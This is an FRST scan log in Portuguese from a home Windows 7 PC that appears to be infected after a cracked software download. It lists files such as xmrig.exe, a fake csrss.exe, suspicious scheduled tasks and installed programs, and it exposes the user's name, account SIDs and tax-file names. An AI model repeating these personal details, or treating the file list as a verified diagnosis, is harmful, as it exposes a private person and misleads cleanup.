2018-06-05 22:07 - 2018-06-05 22:07 - 000001096 _____ C:\Users\Alessandra\Desktop\Play Crossout.lnk
2018-06-05 22:07 - 2018-06-05 22:07 - 000001092 _____ C:\Users\Alessandra\Desktop\Win iPhone X.lnk
2018-06-05 22:07 - 2018-06-05 22:07 - 000000000 ____D C:\Users\Todos os Usuários\dahkService
2018-06-05 22:07 - 2018-06-05 22:07 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-06-05 22:07 - 2018-06-05 22:07 - 000000000 ____D C:\ProgramData\dahkService
2018-06-05 22:07 - 2018-06-05 22:07 - 000000000 ____D C:\Program Files (x86)\io
2018-06-05 22:06 - 2018-06-05 22:24 - 000003520 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-06-05 22:06 - 2018-06-05 22:24 - 000003208 _____ C:\Windows\System32\Tasks\csrss
2018-06-05 22:06 - 2018-06-05 22:11 - 000016080 _____ C:\Users\Alessandra\AppData\Local\InstallationConfiguration.xml
2018-06-05 22:06 - 2018-06-05 22:07 - 005562240 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2018-06-05 22:06 - 2018-06-05 22:07 - 000605552 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 001810944 _____ (TODO: ) C:\Users\Alessandra\AppData\Local\ScotJob.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 000929792 _____ C:\Users\Alessandra\AppData\Local\sham.db
2018-06-05 22:06 - 2018-06-05 22:06 - 000278509 _____ C:\Users\Alessandra\AppData\Local\Unadom.bin
2018-06-05 22:06 - 2018-06-05 22:06 - 000140800 _____ C:\Users\Alessandra\AppData\Local\installer.dat
2018-06-05 22:06 - 2018-06-05 22:06 - 000000000 ___HD C:\Windows\rss
2018-06-05 22:06 - 2018-06-05 22:06 - 000000000 ____D C:\Users\Todos os Usuários\PrefsSecure
2018-06-05 22:06 - 2018-06-05 22:06 - 000000000 ____D C:\ProgramData\PrefsSecure
2018-06-05 22:04 - 2018-06-05 22:04 - 000983550 _____ C:\Users\Alessandra\Downloads\ConvertXtoDVD_5_1_0_2_Crack_Patch_em_Portugues_Full.zip
2018-06-05 21:54 - 2018-06-05 21:54 - 000596494 _____ C:\Users\Alessandra\Downloads\Pokemon GS Demo (1).xlsx
2018-06-05 21:53 - 2018-06-05 21:53 - 000597031 _____ C:\Users\Alessandra\Downloads\Pokemon GS Demo.xlsx
2018-06-05 21:49 - 2017-12-02 08:06 - 541792260 _____ C:\Users\Alessandra\Desktop\1_01_H_171201170000.h264
2018-06-05 21:47 - 2018-06-05 21:47 - 000000000 ____D C:\Program Files (x86)\MediaPlayer
2018-06-05 05:50 - 2018-06-05 05:50 - 001838592 _____ C:\Windows\de4044e4defdf98de3594496c13dd62f.exe
2018-06-05 05:50 - 2018-06-05 05:50 - 000144696 _____ C:\Windows\system32\Drivers\d9f123ea30f4c200a5898caa9c1b70f5.sys
2018-06-05 05:50 - 2018-06-05 05:50 - 000037096 _____ C:\Windows\uninstaller.dat
2018-06-04 10:53 - 2018-06-05 11:11 - 000000000 ____D C:\Users\Alessandra\Desktop\Torneio interscolar mundial
2018-06-04 10:52 - 2018-06-04 10:53 - 004206967 _____ C:\Users\Alessandra\Downloads\Torneio interscolar mundial-20180604T135253Z-001.zip
2018-06-04 09:59 - 2018-06-05 10:30 - 000000000 ____D C:\Users\Alessandra\Desktop\Boku no hero rpg
2018-06-04 09:51 - 2018-06-05 10:26 - 000000000 ____D C:\Users\Alessandra\Desktop\Mutual 2018
2018-06-04 09:45 - 2018-06-04 09:47 - 161073489 _____ C:\Users\Alessandra\Downloads\2017-07-0010-peace-in-christ-complete-mp3-por.zip
2018-06-01 14:14 - 2018-06-01 14:14 - 000000081 _____ C:\Users\Alessandra\Desktop\bnhrpg.txt
2018-05-30 12:27 - 2018-05-30 12:34 - 000176525 _____ C:\Users\Alessandra\Desktop\Ficha Boku no hero.pdf
2018-05-28 13:06 - 2018-05-28 13:06 - 004826048 _____ C:\Users\Alessandra\Downloads\freeshop.cia
2018-05-28 12:34 - 2018-05-28 12:34 - 000000000 ____D C:\Users\Alessandra\Desktop\Classe 1B UA
2018-05-28 12:34 - 2018-05-28 12:34 - 000000000 ____D C:\Users\Alessandra\Desktop\Classe 1A UA
2018-05-28 12:33 - 2018-05-28 12:33 - 001722873 _____ C:\Users\Alessandra\Downloads\drive-download-20180528T153320Z-001.zip
2018-05-28 12:27 - 2018-05-28 12:27 - 000102439 _____ C:\Users\Alessandra\Desktop\Boku-no-Hero.jpeg
2018-05-28 12:23 - 2016-12-01 15:52 - 000000000 ____D C:\Users\Alessandra\Desktop\d&d dados
2018-05-28 12:22 - 2018-05-28 12:22 - 014356903 _____ C:\Users\Alessandra\Downloads\d&d dados (1).rar
2018-05-28 10:58 - 2018-05-28 10:58 - 000174480 _____ C:\Users\Alessandra\Downloads\decTitleKeys.bin
2018-05-25 19:16 - 2018-01-11 17:24 - 001116608 _____ (VoiceFive, Inc.) C:\Windows\system32\pmls64.dll
2018-05-25 19:16 - 2018-01-11 17:24 - 000752576 _____ (VoiceFive, Inc.) C:\Windows\SysWOW64\pmls.dll
2018-05-15 20:49 - 2018-04-10 16:22 - 000043560 ____N (GAS Tecnologia) C:\Windows\system32\Drivers\wsddprm.sys
2018-05-07 18:07 - 2018-05-07 18:07 - 000031989 _____ C:\Users\Alessandra\Downloads\tickets-5af08331e1cb041f50d7fad6 (4).pdf
2018-05-07 18:07 - 2018-05-07 18:07 - 000031989 _____ C:\Users\Alessandra\Downloads\tickets-5af08331e1cb041f50d7fad6 (3).pdf
2018-05-07 18:07 - 2018-05-07 18:07 - 000031989 _____ C:\Users\Alessandra\Downloads\tickets-5af08331e1cb041f50d7fad6 (2).pdf
2018-05-07 18:07 - 2018-05-07 18:07 - 000031989 _____ C:\Users\Alessandra\Downloads\tickets-5af08331e1cb041f50d7fad6 (1).pdf
2018-05-07 17:57 - 2018-05-07 17:57 - 000031989 _____ C:\Users\Alessandra\Downloads\tickets-5af08331e1cb041f50d7fad6.pdf
2018-05-04 10:58 - 2018-05-04 10:58 - 000000000 ____D C:\Users\Alessandra\Documents\lista de empresas
2018-05-04 10:58 - 2018-05-04 10:58 - 000000000 ____D C:\Users\Alessandra\Documents\AUTORIZAÇÕES ESPECIAIS 05 2018
2018-04-27 22:56 - 2018-04-27 22:56 - 000006705 _____ C:\Users\Alessandra\Documents\08601708889-IRPF-A-2018-2017-ORIGI.DBK
2018-04-27 10:32 - 2018-04-27 10:32 - 000000000 ____D C:\Users\Alessandra\.rfb
2018-04-27 10:25 - 2018-04-27 10:27 - 071830472 _____ (Oracle Corporation) C:\Users\Alessandra\Downloads\jre-8u171-windows-x64.exe
2018-04-27 10:20 - 2018-04-27 10:20 - 000001724 _____ C:\Users\Public\Desktop\IRPF2018 - Declaração de Ajuste Anual, Final de Espólio e Saída Definitiva do País.lnk
2018-04-27 10:19 - 2018-04-27 10:19 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programas RFB2018
2018-04-27 10:19 - 2018-04-27 10:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Programas RFB2018
2018-04-27 10:18 - 2018-04-27 10:19 - 031188040 _____ (Receita Federal do Brasil) C:\Users\Alessandra\Downloads\IRPF2018Win32v1.4 (1).exe
2018-04-25 08:42 - 2018-04-25 08:43 - 031188040 _____ (Receita Federal do Brasil) C:\Users\Alessandra\Downloads\IRPF2018Win32v1.4.exe
2018-04-12 13:45 - 2018-06-05 22:20 - 000000352 _____ C:\Windows\Tasks\HPCeeScheduleForAlessandra.job
2018-04-12 13:45 - 2018-06-05 21:43 - 000003216 _____ C:\Windows\System32\Tasks\HPCeeScheduleForAlessandra
2018-04-06 09:16 - 2018-04-06 09:20 - 000000000 ____D C:\Users\Alessandra\Documents\fotos
2018-04-03 06:26 - 2018-04-03 06:26 - 000000000 ____D C:\Program Files\Common Files\Adobe
2018-03-28 09:18 - 2018-03-28 09:18 - 000000000 ____D C:\Users\Alessandra\Documents\Modelos Personalizados do Office
2018-03-28 08:42 - 2018-03-28 08:42 - 000000000 ____D C:\Users\Public\Documents\Tools
2018-03-24 15:34 - 2018-03-24 15:34 - 000000000 ____D C:\Users\Public\Documents\Guid
2018-03-12 22:27 - 2018-03-12 22:27 - 000000000 ____D C:\Users\Alessandra\Downloads\Ultra Necrozma by Glezcar (2704)
2018-03-12 22:27 - 2018-03-12 22:27 - 000000000 ____D C:\Users\Alessandra\Downloads\Mask Island - Steven Universe by Brolopie66 (3426)
2018-03-12 22:27 - 2018-03-12 22:27 - 000000000 ____D C:\Users\Alessandra\Downloads\Majoras Mask by Radnar8959 (3589)
2018-03-12 22:27 - 2018-03-12 22:27 - 000000000 ____D C:\Users\Alessandra\Downloads\Jojo's Bizzare Adventure by blujay (2202)
2018-03-12 22:27 - 2018-03-12 22:27 - 000000000 ____D C:\Users\Alessandra\Downloads\ext_previews
2018-03-12 22:27 - 2018-02-03 16:24 - 000014016 _____ C:\Users\Alessandra\Downloads\info.smdh
2018-03-12 22:27 - 2018-02-03 16:24 - 000000014 _____ C:\Users\Alessandra\Downloads\name.txt
2018-03-12 22:27 - 2017-12-20 01:36 - 002978208 _____ C:\Users\Alessandra\Downloads\bgm.bcstm
2018-03-12 22:27 - 2017-12-20 01:36 - 000830220 _____ C:\Users\Alessandra\Downloads\bgm.ogg
2018-03-12 22:27 - 2017-12-20 01:36 - 000394169 _____ C:\Users\Alessandra\Downloads\body_LZ.bin
2018-03-12 22:15 - 2018-03-12 22:15 - 004500045 _____ C:\Users\Alessandra\Downloads\Ultra Necrozma by Glezcar (2704).zip
2018-03-12 22:14 - 2018-03-12 22:14 - 005579475 _____ C:\Users\Alessandra\Downloads\Jojo's Bizzare Adventure by blujay (2202).zip
2018-03-12 22:14 - 2018-03-12 22:14 - 004866454 _____ C:\Users\Alessandra\Downloads\Mask Island - Steven Universe by Brolopie66 (3426).zip
2018-03-12 22:13 - 2018-03-12 22:14 - 002002121 _____ C:\Users\Alessandra\Downloads\Majoras Mask by Radnar8959 (3589).zip

==================== Três Meses Modificados arquivos e pastas ========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2018-06-06 07:56 - 2009-07-14 01:45 - 000020512 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-06-06 07:56 - 2009-07-14 01:45 - 000020512 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-06-06 07:54 - 2016-12-16 19:30 - 000002230 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-06-06 07:54 - 2016-12-16 19:30 - 000002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2018-06-06 07:47 - 2017-10-05 14:42 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-06-06 07:46 - 2017-05-25 12:25 - 000000000 ____D C:\Program Files (x86)\PremierOpinion
2018-06-06 07:43 - 2009-07-14 02:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-06-05 22:25 - 2017-01-02 15:36 - 000028376 _____ (GAS Tecnologia) C:\Windows\system32\Drivers\wsddfac.sys
2018-06-05 22:23 - 2017-05-25 12:21 - 000003178 __RSH C:\Users\Todos os Usuários\ntuser.pol
2018-06-05 22:23 - 2017-05-25 12:21 - 000003178 __RSH C:\ProgramData\ntuser.pol
2018-06-05 22:23 - 2015-12-18 09:02 - 000000000 ____D C:\Users\Alessandra
2018-06-05 22:20 - 2017-05-08 17:33 - 000000000 ____D C:\Windows\Minidump
2018-06-05 22:18 - 2017-10-20 19:53 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\uTorrent
2018-06-05 22:17 - 2017-10-25 23:18 - 000000000 ____D C:\Users\Alessandra\AppData\LocalLow\uTorrent
2018-06-05 22:14 - 2017-05-25 14:14 - 000001001 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2018-06-05 22:14 - 2017-05-25 14:14 - 000001001 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2018-06-05 22:14 - 2015-12-18 09:03 - 000001277 _____ C:\Users\Alessandra\Desktop\Internet Explorer.lnk
2018-06-05 22:11 - 2009-07-14 00:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-06-05 21:47 - 2009-07-14 14:55 - 002680826 _____ C:\Windows\system32\prfh0416.dat
2018-06-05 21:47 - 2009-07-14 14:55 - 002014884 _____ C:\Windows\system32\prfc0416.dat
2018-06-05 21:47 - 2009-07-14 02:13 - 000006258 _____ C:\Windows\system32\PerfStringBackup.INI
2018-05-30 12:07 - 2009-07-14 02:32 - 000000000 ____D C:\Windows\system32\FxsTmp
2018-05-28 15:07 - 2015-12-18 09:06 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\Skype
2018-05-17 19:53 - 2015-12-18 09:40 - 000003502 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2018-05-17 19:53 - 2015-12-18 09:40 - 000003374 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2018-05-17 19:47 - 2015-12-18 09:43 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-05-17 19:45 - 2017-08-29 19:35 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-05-08 21:13 - 2015-12-26 12:04 - 000000000 ____D C:\Users\Alessandra\AppData\Local\ElevatedDiagnostics

==================== Arquivos na raiz de alguns diretórios =======

2016-02-14 18:27 - 2017-09-12 21:06 - 000000118 _____ () C:\Users\Alessandra\jobq.dat
1601-01-03 21:33 - 1601-01-03 21:33 - 000073216 ____N (Microsoft Corporation) C:\Users\Alessandra\VAxueQ.exe
2018-06-05 22:22 - 2018-06-06 07:48 - 000000004 _____ () C:\ProgramData\lock.dat
2018-06-05 22:22 - 2018-06-06 07:48 - 000000004 _____ () C:\Users\Todos os Usuários\lock.dat
1601-01-03 21:33 - 1601-01-03 21:33 - 000073216 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\EeTooio.exe
2017-02-01 11:20 - 2017-02-01 11:20 - 000000046 _____ () C:\Users\Alessandra\AppData\Roaming\Camdata.ini
2017-02-01 11:20 - 2017-02-01 11:20 - 000000408 _____ () C:\Users\Alessandra\AppData\Roaming\CamLayout.ini
2017-02-01 11:20 - 2017-02-01 11:20 - 000000408 _____ () C:\Users\Alessandra\AppData\Roaming\CamShapes.ini
2017-02-01 11:19 - 2017-02-01 11:19 - 000004509 _____ () C:\Users\Alessandra\AppData\Roaming\CamStudio.cfg
2017-10-25 23:43 - 2017-10-25 23:43 - 000000132 _____ () C:\Users\Alessandra\AppData\Roaming\Preferências do Formato PNG do Adobe CS6
2015-12-26 11:54 - 2015-12-26 11:54 - 000018115 _____ () C:\Users\Alessandra\AppData\Roaming\unins000.dat
2015-12-26 11:54 - 2015-12-26 11:54 - 000730322 _____ () C:\Users\Alessandra\AppData\Roaming\unins000.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 007627776 _____ () C:\Users\Alessandra\AppData\Local\agent.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 000070896 _____ () C:\Users\Alessandra\AppData\Local\Config.xml
2018-06-05 22:07 - 2018-06-05 22:07 - 001895384 _____ () C:\Users\Alessandra\AppData\Local\DamTantax.bin
2016-05-20 20:14 - 2016-05-20 20:14 - 000000000 _____ () C:\Users\Alessandra\AppData\Local\dark990.pig
2018-06-05 22:06 - 2018-06-05 22:11 - 000016080 _____ () C:\Users\Alessandra\AppData\Local\InstallationConfiguration.xml
2018-06-05 22:06 - 2018-06-05 22:06 - 000140800 _____ () C:\Users\Alessandra\AppData\Local\installer.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 000018432 _____ () C:\Users\Alessandra\AppData\Local\Main.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 000005568 _____ () C:\Users\Alessandra\AppData\Local\md.xml
2018-06-05 22:07 - 2018-06-05 22:07 - 000126464 _____ () C:\Users\Alessandra\AppData\Local\noah.dat
2018-06-05 22:06 - 2018-06-05 22:06 - 001810944 _____ (TODO: ) C:\Users\Alessandra\AppData\Local\ScotJob.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 001987953 _____ () C:\Users\Alessandra\AppData\Local\ScotJob.tst
2018-06-05 22:06 - 2018-06-05 22:06 - 000929792 _____ () C:\Users\Alessandra\AppData\Local\sham.db
2018-06-05 22:06 - 2018-06-05 22:06 - 000278509 _____ () C:\Users\Alessandra\AppData\Local\Unadom.bin
2018-06-05 22:11 - 2018-06-05 22:11 - 000032038 _____ () C:\Users\Alessandra\AppData\Local\uninstall_temp.ico
2018-06-05 22:08 - 2018-06-05 22:08 - 000000003 _____ () C:\Users\Alessandra\AppData\Local\wbem.ini

Arquivos para serem movidos ou deletados:
====================
C:\Program Files (x86)\bf1o5vdufsa\VQ4R6SI3GUSCYUI.exe
C:\Windows\rss\csrss.exe
C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe


Alguns arquivos em TEMP:
====================
2018-06-05 22:13 - 2018-06-05 22:13 - 001538232 _____ (BANANA SUMMER LIMITED) C:\Users\Alessandra\AppData\Local\Temp\1528247576tmp.exe
2017-09-20 18:57 - 2016-01-26 01:40 - 000066496 _____ (Autodesk, Inc.) C:\Users\Alessandra\AppData\Local\Temp\AcDeltree.exe
2018-06-05 22:09 - 2018-06-05 22:09 - 013205167 _____ (MAL ) C:\Users\Alessandra\AppData\Local\Temp\b25dktopqhy.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 001240792 _____ () C:\Users\Alessandra\AppData\Local\Temp\but-setup-9.exe
2018-06-05 22:05 - 2018-06-05 22:05 - 002948240 _____ (BitTorrent Inc.) C:\Users\Alessandra\AppData\Local\Temp\ConvertXtoDVD_5_1_0_2_Crack_Patch_em_Portugues_Full_.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 001549592 _____ ( ) C:\Users\Alessandra\AppData\Local\Temp\data.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 001527488 _____ (Microsoft Corporation) C:\Users\Alessandra\AppData\Local\Temp\dbghelp.dll
2018-06-05 22:07 - 2018-06-05 22:07 - 002805760 _____ (Microsoft Corporation) C:\Users\Alessandra\AppData\Local\Temp\installer_mi.exe
2017-09-02 11:15 - 2017-09-02 11:15 - 000740416 _____ (Oracle Corporation) C:\Users\Alessandra\AppData\Local\Temp\jre-8u144-windows-au.exe
2018-06-05 22:07 - 2018-06-05 22:08 - 008460935 _____ () C:\Users\Alessandra\AppData\Local\Temp\s2s.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 000675152 _____ ( ) C:\Users\Alessandra\AppData\Local\Temp\setup (1).exe
2018-06-05 22:05 - 2018-06-05 22:06 - 001810944 _____ (TODO: ) C:\Users\Alessandra\AppData\Local\Temp\setup.exe
2017-07-17 15:15 - 2017-10-30 08:43 - 058881488 _____ (Skype Technologies S.A.) C:\Users\Alessandra\AppData\Local\Temp\SkypeSetup.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 000791610 _____ ( ) C:\Users\Alessandra\AppData\Local\Temp\speedownloader.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 000167616 _____ (Microsoft Corporation) C:\Users\Alessandra\AppData\Local\Temp\symsrv.dll
2017-11-16 12:01 - 2017-10-17 13:01 - 000927784 _____ () C:\Users\Alessandra\AppData\Local\Temp\TAInstaller.exe
2017-12-06 12:15 - 2017-12-06 12:15 - 013767776 _____ (Microsoft Corporation) C:\Users\Alessandra\AppData\Local\Temp\vcredist_x86.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 000423152 _____ (McAfee, Inc.) C:\Users\Alessandra\AppData\Local\Temp\webupd.exe
2018-06-05 22:08 - 2018-06-05 22:08 - 001131341 _____ ( ) C:\Users\Alessandra\AppData\Local\Temp\whiteclick.exe
2014-06-29 16:16 - 2014-06-29 16:16 - 000008704 _____ () C:\Users\Alessandra\AppData\Local\Temp\wlan_test.exe
2009-01-16 06:20 - 2009-01-16 06:20 - 000144088 _____ () C:\Users\Alessandra\AppData\Local\Temp\WZCPlugin_VISTA.exe
2018-06-05 22:12 - 2018-06-06 07:48 - 002064847 _____ () C:\Users\Alessandra\AppData\Local\Temp\xmrig.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 003224064 _____ () C:\Users\Alessandra\AppData\Local\Temp\xtex.exe

==================== Bamital & volsnap ======================

(Não há correção automática para arquivos que não passaram na verificação.)

C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente
C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\system32\services.exe => O arquivo é assinado digitalmente
C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\User32.dll => O arquivo é assinado digitalmente
C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente
C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente

BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restaurado com sucesso

LastRegBack: 2018-05-08 21:06

==================== Fim de FRST.txt ============================





"Addition.txt"

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 03.06.2018
Executado por Alessandra (06-06-2018 08:01:39)
Executando a partir de C:\Users\Alessandra\Desktop
Windows 7 Professional Service Pack 1 (X64) (2015-12-18 12:02:41)
Modo da Inicialização: Normal
==========================================================


==================== Contas: =============================

Administrador (S-1-5-21-1322778411-14668823-402750941-500 - Administrator - Disabled)
Alessandra (S-1-5-21-1322778411-14668823-402750941-1000 - Administrator - Enabled) => C:\Users\Alessandra
Convidado (S-1-5-21-1322778411-14668823-402750941-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1322778411-14668823-402750941-1002 - Limited - Enabled)

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

A360 Desktop (HKLM\...\{7758802D-9486-4883-9927-CCAC366A3BA4}) (Version: 7.2.3.1800 - Autodesk)
ACA & MEP 2017 Object Enabler (HKLM\...\{28B89EEF-0004-0000-5102-CF3F3A09B77D}) (Version: 7.9.45.0 - Autodesk) Hidden
ACAD Private (HKLM\...\{28B89EEF-0001-0000-3102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 18.011.20040 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
Allavsoft 3.15.1.6481 (HKLM-x32\...\{6EBED4D8-13D9-4270-8D44-B57DDB7A787C}_is1) (Version: - Allavsoft Corporation)
Aplicativo da área de trabalho Autodesk (HKLM-x32\...\Autodesk Desktop App) (Version: 7.0.6.378 - Autodesk)
Aplicativos da Autodesk em destaque 2016-2017 (HKLM-x32\...\{27C15055-713B-4D0E-881F-19598A2DFD59}) (Version: 2.2.0 - Autodesk)
AutoCAD 2017 - English (HKLM\...\{28B89EEF-0001-0409-2102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 (HKLM\...\{28B89EEF-0001-0000-0102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 Language Pack - English (HKLM\...\{28B89EEF-0001-0409-1102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk)
Autodesk App Manager 2016-2017 (HKLM-x32\...\{C0954809-F5DC-426C-847E-8409DE14E4C0}) (Version: 2.2.0 - Autodesk)
Autodesk AutoCAD 2017 - English (HKLM\...\AutoCAD 2017 - English) (Version: 21.0.52.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.5 (HKLM-x32\...\{8600F844-9AA5-412E-B6F2-F9C6CBCFD268}) (Version: 1.2.5.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2017 Add-in 64 bit (HKLM\...\{276A67E0-71EB-4827-B5F7-2ACF02BC1A5B}) (Version: 4.37.6853 - Autodesk)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk)
Autodesk ReCap 360 (HKLM\...\{5F0F7049-0000-1033-0102-73A6DA3D7FA6}) (Version: 3.0.0.52 - Autodesk) Hidden
Autodesk ReCap 360 (HKLM\...\Autodesk ReCap 360) (Version: 3.0.0.52 - Autodesk)
Build Tools - amd64 (HKLM\...\{F74753A3-C93C-34F5-A199-993CAF602B7D}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools - x86 (HKLM-x32\...\{FB3A15FD-FC67-3A2F-892B-6890B0C56EA9}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools Language Resources - amd64 (HKLM\...\{05198C22-FFCE-374A-B190-9F18CC99DAEA}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools Language Resources - x86 (HKLM-x32\...\{9347889B-C22A-3905-901F-C05D8F73C929}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
CertiPlugin 1.0.0.11 (HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\{E74B2E92-1570-41FB-AB75-1A618DD3FCE3}_is1) (Version: 1.0.0.11 - Certisign)
CloudNet (HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATENÇÃO
ETDWare X64 11.7.20.5_WHQL (HKLM\...\Elantech) (Version: 11.7.20.5 - ELAN Microelectronic Corp.)
FamilySearch Indexing 3.27.8 (HKLM-x32\...\0591-8077-9297-0833) (Version: 3.27.8 - FamilySearch)
FARO LS 1.1.505.0 (64bit) (HKLM-x32\...\{8834451B-6209-4E02-9EF4-4EF9E3C1F70F}) (Version: 5.5.0.44203 - FARO Scanner Production)
FastDataX 1.20 (HKLM-x32\...\FastDataX_is1) (Version: 1.20 - )
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
GBBD Caixa Economica Federal (HKLM-x32\...\{5d01f486-f32d-462e-8830-cc1d116e8ece}_is1) (Version: 3.12.0.2 - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 66.0.3359.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
HP Deskjet 2050 J510 series Ajuda (HKLM-x32\...\{7A3DF2E2-CF13-44FB-A93E-F71D5381DB3F}) (Version: 140.0.61.61 - Hewlett Packard)
HP Deskjet 2050 J510 series Estudo de aprimoramento de produtos (HKLM\...\{8D71EFB0-B1EF-4478-92D2-A65DB23AC460}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2050 J510 series Software básico do dispositivo (HKLM\...\{2DCBB45E-AA03-4089-87E7-EC17E606D738}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.6.18.11 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{57A79409-9C79-4080-9FFA-09D4DAECC26B}) (Version: 12.9.18.3 - HP)
HP Touchpoint Analytics Client (HKLM\...\{E5FB98E0-0784-44F0-8CEC-95CD4690C43F}) (Version: 4.0.2.1439 - HP Inc.)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HTC Driver Installer (HKLM-x32\...\{4CEEE5D0-F905-4688-B9F9-ECC710507796}) (Version: 4.11.0.001 - Nome de sua empresa:)
iExplorer 3.9.0.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC)
